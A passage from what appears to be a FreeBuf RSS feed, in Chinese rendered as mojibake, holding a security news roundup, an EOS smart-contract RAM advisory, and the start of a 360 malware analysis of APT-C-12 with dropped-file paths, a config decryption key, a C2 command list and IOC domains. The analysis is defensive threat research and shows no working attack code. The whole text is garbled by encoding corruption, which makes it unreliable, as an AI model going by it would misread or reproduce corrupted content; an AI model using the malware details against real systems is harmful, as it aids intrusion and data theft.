812<p style="text-align: center;"><b><b style="color: rgb(0, 176, 80);"><span style="font-size: 15px; color: rgb(239, 71, 71);">安全资讯早知é“,两分钟å¬å®Œæœ€æ–°å®‰å…¨å¿«è®¯~</span><br /></b></b></p>
813<p><b></b></p>
814<p style="text-align: center;"><b> <embed src="//music.163.com/outchain/player?type=3&id=1370327358&auto=0&height=66" width="330" height="110"> </b> </p>
815<p style="text-align: center;"><span style="font-size: 16px;"><span style="font-size: 16px;"><span style="font-size: 16px;"><span style="font-size: 16px;"><span style="font-size: 16px;"><img alt="æ—©é¤" src="http://image.3001.net/images/20180725/15325042064703.jpg!small" width="690" height="401"></span></span> </span> </span> </span></p>
816<p><span style="font-size: 16px;">以下请看详细内容:</span></p>
817<h3>åŠ å¯†æ¼æ´žå½±å“大é‡è“牙实现,主æµåŽ‚å•†è®¾å¤‡éƒ½å—å½±å“</h3>
818<p>近日,大é‡è“牙设备和系统被æ›å˜åœ¨ä¸¥é‡åŠ å¯†æ¼æ´ž CVE-2018-5383ï¼Œæ¼æ´žä¸»è¦æ˜¯å› 为支æŒè“ç‰™çš„è®¾å¤‡æ— æ³•å……åˆ†éªŒè¯â€œå®‰å…¨â€è“ç‰™è¿žæŽ¥æœŸé—´ä½¿ç”¨çš„åŠ å¯†å‚æ•°ã€‚这会导致é…对å‡å¼±å¹¶å¯¼è‡´è¿œç¨‹æ”»å‡»è€…获å–è®¾å¤‡ä½¿ç”¨çš„åŠ å¯†å¯†é’¥ï¼Œå¹¶æ¢å¤â€œå®‰å…¨â€è“牙连接ä¸çš„两个设备之间å‘é€çš„æ•°æ®ã€‚</p>
819<p style="text-align: center;"><img alt="è“牙.png" src="http://image.3001.net/images/20180725/15325042786020.png!small" width="690" height="248"></p>
820<p>ç›®å‰ï¼Œè‹¹æžœã€åšé€šã€è‹±ç‰¹å°”ã€é«˜é€šç‰å¤šå®¶ç¡¬ä»¶åŽ‚å•†éƒ½ç¡®è®¤å…¶è“牙实现和æ“作系统驱动都å—到影å“,苹果ã€åšé€šå’Œè‹±ç‰¹å°”å·²ç»å‘布了修å¤è¡¥ä¸ã€‚[æ¥æºï¼š<a href="https://www.bleepingcomputer.com/news/security/many-bluetooth-implementations-and-os-drivers-affected-by-crypto-bug/">bleepingcomputer</a>]</p>
821<h3>电å邮件网络攻击急剧上å‡ï¼Œé‚®ä»¶å®‰å…¨é£Žé™©å¢žå¤§</h3>
822<p>ç½‘ç»œå®‰å…¨å…¬å¸ Mimecast 近期å‘布了《2018 邮件安全现状》报告,报告显示,攻击者æŒç»é’ˆå¯¹ç»ˆç«¯ç”¨æˆ·å‘èµ·é‚®ä»¶æ”»å‡»ï¼Œé‚®ä»¶æ”»å‡»æ•°é‡æ€¥å‰§ä¸Šå‡ã€‚在报告的å—访者ä¸ï¼Œå°†è¿‘ 40% çš„ C 端用户都认为自己所在公å¸çš„ CEO 是公å¸å®‰å…¨çš„薄弱环节;31% çš„ C ç«¯ç”¨æˆ·éƒ½æ›¾é€šè¿‡é‚®ä»¶ä¸æ…Žå°†æ•感数æ®å‘é€ç»™æ— 关人员。</p>
823<p style="text-align: center;"><img alt="邮件" src="http://image.3001.net/images/20180725/15325043055015.jpg!small" width="690" height="270"></p>
824<p>æ¤å¤–,2017 年有 92% 的勒索软件都是通过邮件分å‘ï¼Œé€ æˆäº†è¾ƒå¤§å±å®³ã€‚90% çš„ç»„ç»‡éƒ½è¡¨ç¤ºé‚®ä»¶é’“é±¼æ”»å‡»æ•°é‡æœ‰æ‰€å¢žé•¿ã€‚ä½†æ˜¯ï¼Œåªæœ‰ 11% çš„ä¼ä¸šä¸æ–培è®å‘˜å·¥è¯†åˆ«ç½‘络攻击,而52% çš„ä¼ä¸šæ¯å¹´åªç»„织一次培è®ã€‚Mimecast CEO 表示,电å邮件攻击æŒç»å¢žé•¿ï¼Œé™¤äº†å¸¸è§„的防御之外,ä¼ä¸šè¿˜éœ€è¦é‡‡å–其他应对措施æ¥ç¡®ä¿å®‰å…¨ã€‚[æ¥æºï¼š<a href="https://www.infosecurity-magazine.com/news/emailbased-attacks-a-growing-risk/">infosecurity</a>]</p>
825<h3>è°·æŒå¼•入物ç†å¯†é’¥åŽï¼Œ8.5 万雇员都没有å†è¢«æˆåŠŸé’“é±¼</h3>
826<p>安全åšå®¢ KrebsOnSecurity 报é“,Google 从 2017 å¹´åˆå¼€å§‹è¦æ±‚所有雇员使用物ç†å¯†é’¥æ›¿ä»£å¯†ç ,æ¤åŽè¯¥å…¬å¸ 8.5 万å雇员没有一ä½çš„å·¥ä½œç›¸å…³å¸æˆ·è¢«æˆåŠŸé’“é±¼ã€‚ç‰©ç†å®‰å…¨å¯†é’¥æ˜¯å»‰ä»·çš„ USB 设备,å¯ä½œä¸ºåŒé‡è®¤è¯ï¼ˆ2FAï¼‰çš„æ›¿ä»£ã€‚å½“ç”¨æˆ·ç™»å½•æ—¶ï¼Œæ—¢éœ€è¦æä¾›å¯†ç ï¼Œè¿˜éœ€è¦æä¾›ç§»åŠ¨è®¾å¤‡ç‰ç‰©ç†å®‰å…¨å¯†é’¥ã€‚</p>
827<p style="text-align: center;"><img alt="yubikey.png" src="http://image.3001.net/images/20180725/1532504362552.png!small" width="399" height="366.74826789838335"></p>
828<p>Google å‘言人称,物ç†å®‰å…¨å¯†é’¥æ˜¯è®¿é—® Google æ‰€æœ‰å¸æˆ·çš„基础,自推行物ç†å®‰å…¨å¯†é’¥ä»¥æ¥ï¼Œå…¬å¸å†…é›‡å‘˜æ²¡æœ‰å†æŠ¥å‘Šè¿‡è´¦å·è¢«æŽ¥ç®¡çš„问题。[æ¥æºï¼š<a href="https://krebsonsecurity.com/2018/07/google-security-keys-neutered-employee-phishing/">krebsonsecurity</a>】</p>
829<h3>é»‘å®¢åœ¨è™šå‡ HTTP 错误页é¢ä¸éšè—登陆页é¢ï¼ŒèŽ·å– webshell 用于攻击</h3>
830<p>å®‰å…¨ç ”ç©¶äººå‘˜å‘çŽ°ï¼Œé»‘å®¢åœ¨ä¼ªé€ çš„ HTTP 错误页é¢ä¸éšè—登录表å•ã€èŽ·å– webshell 访问æƒé™ç”¨äºŽæ”»å‡»çš„è¡Œä¸ºè¿‘æœŸæœ‰æ‰€å¢žåŠ ã€‚è¿™äº›é¡µé¢å‡è£…出现 HTTP 错误,例如 404 Not Found 或 Forbiddenï¼Œä½†å®žé™…ä¸Šå´æ˜¯ç™»å½•页é¢ï¼Œå…许攻击者访问 webshell 以在æœåŠ¡å™¨ä¸Šå‘出命令。</p>
831<p style="text-align: center;"><img alt="social-image-3.jpg" src="http://image.3001.net/images/20180725/15325044319579.jpg!small" width="690" height="276"></p>
832<p>利用 webshell,黑客å¯ä»¥ä¸Šä¼ æ¶æ„软件ã€ç½‘ç»œé’“é±¼è„šæœ¬æˆ–å…¶ä»–è½¯ä»¶ã€‚å¦‚æžœä¸æ…Žç‚¹å‡»åˆ°é¡µé¢ï¼Œå°±å¯èƒ½ä¸æ‹›ã€‚è¿™å¹¶éžæ˜¯ä¸€ç§æ–°çš„æ”»å‡»æŠ€æœ¯ï¼Œä½†è¿‘æ¥è¶Šæ¥è¶Šé¢‘ç¹ï¼Œå®¹æ˜“让ä¸ç†Ÿæ‚‰çš„人上当。[æ¥æºï¼š<a href="https://www.bleepingcomputer.com/news/security/hackers-hiding-web-shell-logins-in-fake-http-error-pages/">bleepingcomputer</a>]</p>
833<h3>APP <b>注销难引官媒关注,人民日报点评称è¦ä¿éšœä¿¡æ¯å®‰å…¨</b></h3>
834<p>近日,ä¸å›½é’年报社社会调查ä¸å¿ƒè”åˆé—®å·ç½‘,对 2002 åå—访者进行的一项调查显示,75.9% çš„å—访者é‡åˆ°è¿‡ APP è´¦å·é𾿳¨é”€çš„æƒ…况,62.9% çš„å—访者担心 APP è´¦å·æ³¨é”€éš¾ä¼šå¯¼è‡´è´¦å·è¢«ç›—用。目å‰ï¼Œå¾ˆå¤šåº”用软件商通过 APP 注册的形å¼èŽ·å–用户数æ®ï¼Œç„¶åŽå°†æ•°æ®å–出æ¥èŽ·å–æ”¶ç›Šï¼Œç»™ç”¨æˆ·é€ æˆç§ç§å›°æ‰°ã€‚</p>
835<p style="text-align: center;"><img alt="注销" src="http://image.3001.net/images/20180725/15325045954494.jpg!small" width="690" height="441.6"></p>
836<p>对于应用软件商而言,设置简å•的注销通é“在技术层é¢å¹¶ä¸éš¾ï¼Œä½†ä¸šå†…人士é€éœ²ï¼Œè¿™äº›è½¯ä»¶å•†å¹¶ä¸æ„¿æ„è®©ç”¨æˆ·æ³¨é”€ï¼Œè¿™æ ·ä»–ä»¬å°±èƒ½ä¿è¯è‡ªå·±æŽŒæ¡è¶Šæ¥è¶Šå¤šçš„用户数æ®ï¼Œç”¨äºŽå°†æ¥å˜çŽ°ã€‚äººæ°‘æ—¥æŠ¥æµ·å¤–ç‰ˆè®¤ä¸ºï¼ŒAPP è´¦å·æ³¨é”€éš¾çš„行为其实是对用户éšç§çš„ä¾µçŠ¯ã€‚å¯¹äºŽæ‹’ç»æ³¨é”€è´¦æˆ·çš„行为,《电信和互è”网用户个人信æ¯ä¿æŠ¤è§„定》和网络安全法都明确了惩戒举措,但从现状æ¥çœ‹ï¼Œæƒ©ç½šåŠ›åº¦æ˜Žæ˜¾ä¸å¤Ÿå¤§ã€‚未æ¥éœ€è¦æ›´ä¸¥åŽ‰çš„åº”å¯¹ä¸¾æŽªã€‚[æ¥æºï¼š<a href="http://it.people.com.cn/n1/2018/0723/c1009-30163179.html" target="_blank" ref="nofollow">人民网</a>]</p>
837<p><span style="color: rgb(159, 163, 168);"><b>*AngelaY 编译整ç†ï¼Œè½¬è½½è¯·æ³¨æ˜Žæ¥è‡ª FreeBuf.COM</b></span></p>
838]]></content:encoded>
839 <wfw:commentRss>http://www.freebuf.com/news/178730.html/feed</wfw:commentRss>
840 <slash:comments>2</slash:comments>
841 </item>
842 <item>
843 <title>è¦æƒ• | æ¶æ„EOSåˆçº¦å˜åœ¨åžå™¬ç”¨æˆ·RAM的安全风险</title>
844 <link>http://www.freebuf.com/vuls/178812.html</link>
845 <comments>http://www.freebuf.com/vuls/178812.html#comments</comments>
846 <pubDate>Wed, 25 Jul 2018 15:44:16 +0000</pubDate>
847 <dc:creator>美图安全应急å“应ä¸å¿ƒ</dc:creator>
848 <category><![CDATA[区å—链安全]]></category>
849 <category><![CDATA[æ¼æ´ž]]></category>
850 <category><![CDATA[EOS]]></category>
851 <category><![CDATA[RAM]]></category>
852
853 <guid isPermaLink="false">http://www.freebuf.com/?p=178812</guid>
854 <description><![CDATA[EOS,是专门为商用分布å¼åº”用而设计的一款高性能区å—链æ“ä½œç³»ç»Ÿï¼Œæ˜¯ä¸€ç§æ–°çš„区å—链架构,旨在实现分布å¼åº”用的高性能扩展。EOSçš„å‘布,被誉为区å—链3.0时代的到æ¥ã€‚ 类似于区å—链2.0æ—¶ä»£çš„ä»¥å¤ªåŠæŠ€æœ¯ï¼ŒEOSåŒæ ·æ”¯æŒéƒ¨ç½²å’Œè¿è¡Œæ™ºèƒ½åˆçº¦ã€‚EOS的智能åˆçº¦è™šæ‹ŸæœºåŸºäºŽWASM,å³Web Assembly,它是谷æŒã€è‹¹æžœã€å¾®è½¯ç‰ä¼—多公å¸åŒæ—¶æ”¯æŒçš„一ç§ä¸é—´ä»£ç (å—节ç ), 用于在æµè§ˆå™¨ä¸é«˜æ•ˆæ‰§è¡ŒåŽŸæœ¬javascript引擎执行的本地逻辑。常用è¯è¨€(c/c++ç‰)编写的程åºå¯ä»¥ç¼–译æˆwasmå—节ç ,也就是说EOS智能åˆçº¦å…¼å®¹æ‰€æœ‰ç”¨c, c++ç‰é«˜çº§è¯è¨€ç¼–写的程åºã€‚åŒæ—¶wasmå—èŠ‚ç æ—¢å¯ä»¥ç¼–è¯‘æˆæœºå™¨ç åŽæ‰§è¡Œï¼Œåˆå¯ä»¥ä½¿ç”¨è§£é‡Šå™¨ç›´æŽ¥æ‰§è¡Œ, 兼容性和性能兼顾。 在EOS智能åˆçº¦æ‰§è¡Œè¿‡ç¨‹ä¸ï¼Œéœ€è¦æ¶ˆè€—EOS节点的cpu和内å˜èµ„æºï¼Œè¿™äº›èµ„æºæŒ‰ç…§äº¤æ˜“å‘生时的CPU资æºå’ŒRAM资æºä»·æ ¼ï¼Œæ”¯ä»˜ç»™EOS节点,从å‰ä¸€æ®µæ—¶é—´è¢«çˆ†ç‚’çš„RAMä»·æ ¼å°±å¯ä»¥çœ‹åˆ°RAM的稀缺性。 æ¼æ´žå±å®³ 本次å‘çŽ°çš„æ¼æ´žï¼Œæ°å¥½ä¼šå¯¼è‡´ç”¨æˆ·è´¦æˆ·å†…çš„RAMå¯èƒ½è¢«æ¶æ„消耗,引å‘直接财产æŸå¤±ã€‚ æ¶æ„EOSåˆçº¦å˜åœ¨åžå™¬ç”¨æˆ·RAM的安全风险,需è¦å¼•èµ·å„大交易所ã€é’±åŒ…ã€token空投方ã€DAppã€ç”¨æˆ·ç‰çš„è¦æƒ•,é¿å…éå—æŸå¤±ã€‚ 披露过程 安全起è§ï¼Œæˆ‘们已ç»é€šçŸ¥blockone å’Œæ…¢é›¾ï¼Œæ¼æ´žç»†èŠ‚åŽç»å°†åœ¨ã€Œç¾Žå›¾åŒºå—链实验室ã€å…¬ä¼—å·ã€FreeBufåŠå…¶å®ƒåª’ä½“å¹³å°æŠ«éœ²ã€‚ 防御手段 相关项目方在åšè½¬è´¦æ“作时å¯é€šè¿‡å‘½ä»¤è¡Œ “cleos get code” 判æ–ç›®æ ‡åœ°å€æ˜¯å¦ä¸ºåˆçº¦åœ°å€ï¼Œé¿å…RAMè¢«æ¶æ„åžå™¬å¯¼è‡´æŸå¤±ã€‚ å¦å¤–在问题未解决之å‰ï¼Œå¯ä»¥å‡å°‘用æ¥è½¬è´¦çš„è´¦æˆ·æŒæœ‰çš„ RAM æ•°é‡ï¼Œå°½å¯èƒ½é¿å…éå—æŸå¤±ã€‚ 如å‘现转账过程ä¸RAM使用异常,å¯ä»¥ç¬¬ä¸€æ—¶é—´è”系我们:security@meitu.com。  美图区å—链实验室&美图安全应急å“应ä¸å¿ƒè”åˆå£°æ˜Ž *本文作者:美图应急å“应ä¸å¿ƒï¼Œè½¬è½½è¯·æ³¨æ˜Žæ¥è‡ªFreeBuf.COM]]></description>
855 <content:encoded><![CDATA[<p><span style="color: rgb(0, 176, 80);"><b>EOS,是专门为商用分布å¼åº”用而设计的一款高性能区å—链æ“ä½œç³»ç»Ÿï¼Œæ˜¯ä¸€ç§æ–°çš„区å—链架构,旨在实现分布å¼åº”用的高性能扩展。EOSçš„å‘布,被誉为区å—链3.0时代的到æ¥ã€‚</b></span></p>
856<p><span style="color: rgb(0, 176, 80);"><b><img alt="1.jpg" src="http://image.3001.net/images/20180725/15325326938295.jpg!small" width="690" height="386"></b></span></p>
857<p>类似于区å—链2.0æ—¶ä»£çš„ä»¥å¤ªåŠæŠ€æœ¯ï¼ŒEOSåŒæ ·æ”¯æŒéƒ¨ç½²å’Œè¿è¡Œæ™ºèƒ½åˆçº¦ã€‚EOS的智能åˆçº¦è™šæ‹ŸæœºåŸºäºŽWASM,å³Web Assembly,它是谷æŒã€è‹¹æžœã€å¾®è½¯ç‰ä¼—多公å¸åŒæ—¶æ”¯æŒçš„一ç§ä¸é—´ä»£ç (å—节ç ), 用于在æµè§ˆå™¨ä¸é«˜æ•ˆæ‰§è¡ŒåŽŸæœ¬javascript引擎执行的本地逻辑。常用è¯è¨€(c/c++ç‰)编写的程åºå¯ä»¥ç¼–译æˆwasmå—节ç ,也就是说EOS智能åˆçº¦å…¼å®¹æ‰€æœ‰ç”¨c, c++ç‰é«˜çº§è¯è¨€ç¼–写的程åºã€‚åŒæ—¶wasmå—èŠ‚ç æ—¢å¯ä»¥ç¼–è¯‘æˆæœºå™¨ç åŽæ‰§è¡Œï¼Œåˆå¯ä»¥ä½¿ç”¨è§£é‡Šå™¨ç›´æŽ¥æ‰§è¡Œ, 兼容性和性能兼顾。</p>
858<p>在EOS智能åˆçº¦æ‰§è¡Œè¿‡ç¨‹ä¸ï¼Œéœ€è¦æ¶ˆè€—EOS节点的cpu和内å˜èµ„æºï¼Œè¿™äº›èµ„æºæŒ‰ç…§äº¤æ˜“å‘生时的CPU资æºå’ŒRAM资æºä»·æ ¼ï¼Œæ”¯ä»˜ç»™EOS节点,从å‰ä¸€æ®µæ—¶é—´è¢«çˆ†ç‚’çš„RAMä»·æ ¼å°±å¯ä»¥çœ‹åˆ°RAM的稀缺性。</p>
859<h2>æ¼æ´žå±å®³</h2>
860<p><span style="color: rgb(239, 71, 71);"><b>本次å‘çŽ°çš„æ¼æ´žï¼Œæ°å¥½ä¼šå¯¼è‡´ç”¨æˆ·è´¦æˆ·å†…çš„RAMå¯èƒ½è¢«æ¶æ„消耗,引å‘直接财产æŸå¤±ã€‚</b></span></p>
861<p>æ¶æ„EOSåˆçº¦å˜åœ¨åžå™¬ç”¨æˆ·RAM的安全风险,需è¦å¼•èµ·å„大交易所ã€é’±åŒ…ã€token空投方ã€DAppã€ç”¨æˆ·ç‰çš„è¦æƒ•,é¿å…éå—æŸå¤±ã€‚</p>
862<h2>披露过程</h2>
863<p>安全起è§ï¼Œæˆ‘们已ç»é€šçŸ¥blockone å’Œæ…¢é›¾ï¼Œæ¼æ´žç»†èŠ‚åŽç»å°†åœ¨ã€Œç¾Žå›¾åŒºå—链实验室ã€å…¬ä¼—å·ã€FreeBufåŠå…¶å®ƒåª’ä½“å¹³å°æŠ«éœ²ã€‚</p>
864<h2>防御手段</h2>
865<p>相关项目方在åšè½¬è´¦æ“作时å¯é€šè¿‡å‘½ä»¤è¡Œ “cleos get code” 判æ–ç›®æ ‡åœ°å€æ˜¯å¦ä¸ºåˆçº¦åœ°å€ï¼Œé¿å…RAMè¢«æ¶æ„åžå™¬å¯¼è‡´æŸå¤±ã€‚</p>
866<p>å¦å¤–在问题未解决之å‰ï¼Œå¯ä»¥å‡å°‘用æ¥è½¬è´¦çš„è´¦æˆ·æŒæœ‰çš„ RAM æ•°é‡ï¼Œå°½å¯èƒ½é¿å…éå—æŸå¤±ã€‚</p>
867<p>如å‘现转账过程ä¸RAM使用异常,å¯ä»¥ç¬¬ä¸€æ—¶é—´è”系我们:<a href="mailto:security@meitu.com">security@meitu.com</a>。 </p>
868<p><span style="color: rgb(159, 163, 168);"><i>美图区å—链实验室&美图安全应急å“应ä¸å¿ƒè”åˆå£°æ˜Ž</i></span></p>
869<p><b style=""><span style="color: rgb(159, 163, 168);">*本文作者:美图应急å“应ä¸å¿ƒ</span></b><b style="color: rgb(159, 163, 168);">,转载请注明æ¥è‡ªFreeBuf.COM</b> </p>
870]]></content:encoded>
871 <wfw:commentRss>http://www.freebuf.com/vuls/178812.html/feed</wfw:commentRss>
872 <slash:comments>5</slash:comments>
873 </item>
874 <item>
875 <title>è“å®è‡(APT-C-12)æœ€æ–°æ”»å‡»æ ·æœ¬åŠC&C机制分æž</title>
876 <link>http://www.freebuf.com/articles/system/178422.html</link>
877 <comments>http://www.freebuf.com/articles/system/178422.html#comments</comments>
878 <pubDate>Wed, 25 Jul 2018 12:06:07 +0000</pubDate>
879 <dc:creator>360天眼实验室</dc:creator>
880 <category><![CDATA[系统安全]]></category>
881 <category><![CDATA[æ¶æ„文件]]></category>
882 <category><![CDATA[è“å®è‡]]></category>
883 <category><![CDATA[诱饵]]></category>
884
885 <guid isPermaLink="false">http://www.freebuf.com/?p=178422</guid>
886 <description><![CDATA[背景 ç»§360å…¬å¸æŠ«éœ²äº†è“å®è‡(APT-C-12)æ”»å‡»ç»„ç»‡çš„ç›¸å…³èƒŒæ™¯ä»¥åŠæ›´å¤šé’ˆå¯¹æ€§æ”»å‡»æŠ€æœ¯ç»†èŠ‚åŽï¼Œ360å¨èƒæƒ…报ä¸å¿ƒè¿‘期åˆç›‘æµ‹åˆ°è¯¥ç»„ç»‡å®žæ–½çš„æ–°çš„æ”»å‡»æ´»åŠ¨ï¼Œæœ¬æ–‡ç« æ˜¯å¯¹å…¶ç›¸å…³æŠ€æœ¯ç»†èŠ‚çš„è¯¦ç»†åˆ†æžã€‚ æ ·æœ¬åˆ†æž è¯±é¥µæ–‡ä»¶ 在APT-C-12组织近期的攻击活动ä¸ï¼Œå…¶ä½¿ç”¨äº†ä¼ªè£…戔ä¸å›½è½»å·¥ä¸šè”åˆä¼šæŠ•资现况与åˆä½œæ„å‘简介”的诱导文件,结åˆè¯¥ç»„织过去的攻击手法,该诱饵文件会éšé±¼å‰é‚®ä»¶è¿›è¡ŒæŠ•递。 å¦‚ä¸‹å›¾æ‰€ç¤ºè¯¥è¯±é¥µæ–‡ä»¶ä¼ªè£…æˆæ–‡ä»¶å¤¹çš„å›¾æ ‡ï¼Œæ‰§è¡ŒåŽä¼šæ‰“å¼€åŒ…å«æœ‰è¯±é¥µæ–‡æ¡£å’Œå›¾ç‰‡çš„æ–‡ä»¶å¤¹ï¼Œè€Œæ¤æ—¶å®žé™…çš„æ¶æ„è½½è·å·²ç»åœ¨åŽå°æ‰§è¡Œã€‚ 当该诱饵文件è¿è¡Œæ—¶ï¼Œå…¶ä¼šè§£å¯†é‡Šæ”¾4个文件,其ä¸ä¸¤ä¸ªä¸ºä¸Šè¿°çš„诱导文档和图片,å¦å¤–ä¸ºä¸¤ä¸ªæ¶æ„çš„tmp文件。 é‡Šæ”¾çš„æ¶æ„tmp文件路径为: %temp%\unicode32.tmp %appdata%\WinRAR\update.tmp 最åŽé€šè¿‡LoadLibraryWåŠ è½½é‡Šæ”¾çš„unicode32.tmp文件。 unicode32.tmp unicode32.tmp为一个loader,其主è¦ç”¨äºŽåŠ è½½update.tmp,如下图所示其通过rundll32.exeåŠ è½½update.tmp,并调用其导出函数jj。 å½“åŠ è½½äº†update.tmpåŽï¼Œä¼šåˆ 除装载exeç¨‹åºæ–‡ä»¶å’Œè‡ªèº«ã€‚ update.tmp 该文件为一个DLL,并有一个å为jj的导出函数。 å…¶é¦–å…ˆä¼šå¯¹ç›®æ ‡ä¸»æœºè¿›è¡Œä¿¡æ¯æ”¶é›†ã€‚ 获å–系统版本信æ¯ï¼š 调用CreateToolhelp32Snapshot获å–系统进程信æ¯ï¼š 调用GetAdaptersInfo获å–网å¡MAC地å€ï¼š 判æ–当å‰ç³»ç»ŸçŽ¯å¢ƒæ˜¯32使ˆ–64ä½ï¼š 通过注册表获å–已安装的程åºä¿¡æ¯ï¼ŒèŽ·å–的安装程åºä¿¡æ¯åŠ ä¸Šå‰ç¼€â€ISLâ€æ ¼å¼åŒ–: 通过注册表获å–DisplayNameå’ŒDisplayVersion的信æ¯ï¼Œå¹¶å°†DisplayName å’ŒDisplayVersionæ ¼å¼åŒ–为â€%sâ€:{“NDâ€:â€%sâ€,â€DVâ€:â€%sâ€}。 ä¿¡æ¯æ”¶é›†åŽä¼šé¦–å…ˆå‘远程控制æœåС噍å‘é€ä¸Šçº¿ä¿¡æ¯ã€‚ 获å–tmp目录, 创建AdobeNW目录,并从控制æœåŠ¡å™¨ä¸Šä¸‹è½½AdobeUpdate.tmp作为第二阶段的载è·ï¼Œå…¶å®žé™…为一个DLL文件。 最终调用rundll32å¯åЍDLL文件的导出函数MainFun,如果进程创建æˆåŠŸç»™æœåŠ¡å™¨è¿”å›žä¿¡æ¯ã€‚ AdobeUpdate.tmp AdobeUpdate.tmp为DLL文件,其导出方法MainFun由第一阶段木马DLL调用执行。 其首先é历%USERPROFILE%\AppData路径下tmpåŽç¼€æ–‡ä»¶ï¼Œå¹¶åˆ 除。 ç„¶åŽä»Žæ–‡ä»¶è‡ªèº«å°¾éƒ¨è¯»å–é…置信æ¯å¹¶è§£å¯†ï¼Œå…¶æ ¼å¼å¦‚下: åŠ å¯†çš„é…置信æ¯ï¼ŒåŒ…æ‹¬æ ‡è¯†ID,控制æœåŠ¡å™¨åœ°å€ï¼ŒåР坆IVå’ŒKEY,以åŠMutexä¿¡æ¯ï¼› 4å—èŠ‚åŠ å¯†é…置信æ¯é•¿åº¦ï¼› 17å—节解密密钥; 例如上图所示的解密é…置文件的KEY为sobcsnkciatwiffi,其解密算法如下: 解密之åŽçš„é…置文件如下所示: 查询HKEY_CURRENT_USER下的MyAppæ³¨å†Œè¡¨æŸ¥çœ‹æ˜¯å¦æœ‰FirstExec, 通过å—符串â€noâ€æ¥åˆ¤æ–该DLLæ˜¯å¦æ˜¯ç¬¬ä¸€æ¬¡æ‰§è¡Œã€‚ è‹¥DLLä¸ä¸ºé¦–æ¬¡æ‰§è¡Œï¼Œåˆ™è½®è¯¢èŽ·å–æŽ§åˆ¶æœåŠ¡å™¨å‘½ä»¤ï¼Œå¦åˆ™é历ç£ç›˜C:到F:ä¸çš„æ–‡æ¡£æ–‡ä»¶ä¿¡æ¯ï¼Œå¹¶ä¿å˜åœ¨temp文件夹下的list_tmp.txtä¸ã€‚ 其䏿Ÿ¥æ‰¾çš„æ–‡æ¡£ç±»åž‹åŒ…括.ppt .pptx .pdf.xls .xlsx .doc .docx .txt .wps .rtf的文档,将文档文件路径ã€åˆ›å»ºæ—¶é—´ä»¥åŠæ–‡ä»¶å¤§å°ä¿¡æ¯è¿›è¡Œä¿å˜ã€‚ ä¸‹å›¾ä¸ºç¤ºä¾‹çš„å†™å…¥æ•°æ®æ ¼å¼(文件路径 创建时间文件大å°): å¹¶å°†list_tmp.txt进行aesåŠ å¯†åŽä¸Šä¼ 到控制æœåŠ¡å™¨ï¼š 接ç€è®¾ç½®æ³¨å†Œè¡¨FirstExecæ ‡å¿—ï¼š AdobeUpdate.dll木马实现了丰富的命令控制指令,其通过访问控制域å获å–åŒ…å«æœ‰æŽ§åˆ¶å‘½ä»¤çš„æ–‡ä»¶ï¼Œå¹¶åœ¨æœ¬åœ°è§£å¯†è§£æžåŽæ‰§è¡Œã€‚ 其指令以***和对应指令数å—组æˆï¼Œä»¥ä¸‹ä¸ºæŽ§åˆ¶æŒ‡ä»¤åŠŸèƒ½åˆ—è¡¨ï¼š ***1 执行cmd命令 ***2 æ›´æ–°AppNameé…ç½® ***3 æ–‡ä»¶ä¸Šä¼ ***4 文件下载 ***5 更新控制域å ***7 ä¸Šä¼ æ–‡æ¡£æ–‡ä»¶åˆ—è¡¨ä¿¡æ¯ ***8 执行dll文件或exe ***9 æ–‡ä»¶åˆ é™¤ ***10 指定文件列表信æ¯ä¸Šä¼ ***11 ä¿ç•™ 控制基础设施 APT-C-12组织近期活动ä¸ä½¿ç”¨çš„æ¶æ„代ç 利用了applinzi.com域å下的二级域å作为控制域å,该域å为Sina App Engine的云æœåŠ¡æ‰˜ç®¡ã€‚ 我们测试注册了SAE的账户,其默认创建应用å¯ä»¥å…费使用å多天,并支æŒå¤šç§å¼€å‘è¯è¨€çš„环境部署。 我们å°è¯•对其控制æœåŠ¡å™¨è¿›è¡Œè¿žæŽ¥ï¼Œä½†å…¶åŽå°å¤„ç†ç¨‹åºå·²ç»å‡ºé”™ï¼Œé€šè¿‡è¿”å›žçš„é”™è¯¯ä¿¡æ¯æˆ‘们å¯ä»¥å‘现该组织使用Python部署的åŽå°åº”用,并使用了flask作为其WebæœåŠ¡å®žçŽ°ã€‚ SAE控制åè®® 该组织针对SAE的部署应用实现了一套访问å议,其分为put,info,get,del四个功能。 å…¶ä¸putç”¨äºŽä¸Šä¼ æ–‡ä»¶ï¼š getç”¨äºŽèŽ·å–æ–‡ä»¶ï¼š info用于获å–ä¿¡æ¯ï¼š delç”¨äºŽåˆ é™¤æ–‡ä»¶ï¼š 总结 ç»§360å¨èƒæƒ…报ä¸å¿ƒå‘现该组织利用Digital Ocean云æœåŠ¡ä½œä¸ºå‘½ä»¤æŽ§åˆ¶å’Œå›žä¼ é€šä¿¡æ¸ é“以åŽï¼Œæˆ‘们åˆå‘现该组织使用国内的云æœåŠ¡SAEæž„å»ºå…¶æŽ§åˆ¶å›žä¼ åŸºç¡€è®¾æ–½ï¼Œåˆ©ç”¨è¿™ç§æ–¹å¼ä¸€å®šç¨‹åº¦ä¸Šå‡å°‘äº†æ”»å‡»åˆ©ç”¨çš„æˆæœ¬ï¼Œä¹Ÿå¢žåŠ äº†åˆ†æžå›žæº¯çš„难度。 IOC crecg.applinzi.com costbank.applinzi.com å‚考链接 https://sae.sina.com.cn/ 原文链接: https://ti.360.net/blog/articles/latest-sample-and-c2-mechanism-of-apt-c-12/ *本文作者:360天眼实验室,转载请注明æ¥è‡ªFreeBuf.COM]]></description>
887 <content:encoded><![CDATA[<h2>背景<br /></h2>
888<p><b style="color: rgb(0, 176, 80);"> ç»§360å…¬å¸æŠ«éœ²äº†è“å®è‡(APT-C-12)æ”»å‡»ç»„ç»‡çš„ç›¸å…³èƒŒæ™¯ä»¥åŠæ›´å¤šé’ˆå¯¹æ€§æ”»å‡»æŠ€æœ¯ç»†èŠ‚åŽï¼Œ360å¨èƒæƒ…报ä¸å¿ƒè¿‘期åˆç›‘æµ‹åˆ°è¯¥ç»„ç»‡å®žæ–½çš„æ–°çš„æ”»å‡»æ´»åŠ¨ï¼Œæœ¬æ–‡ç« æ˜¯å¯¹å…¶ç›¸å…³æŠ€æœ¯ç»†èŠ‚çš„è¯¦ç»†åˆ†æžã€‚</b></p>
889<h2>æ ·æœ¬åˆ†æž</h2>
890<h3>诱饵文件</h3>
891<p> 在APT-C-12组织近期的攻击活动ä¸ï¼Œå…¶ä½¿ç”¨äº†ä¼ªè£…戔ä¸å›½è½»å·¥ä¸šè”åˆä¼šæŠ•资现况与åˆä½œæ„å‘简介”的诱导文件,结åˆè¯¥ç»„织过去的攻击手法,该诱饵文件会éšé±¼å‰é‚®ä»¶è¿›è¡ŒæŠ•递。</p>
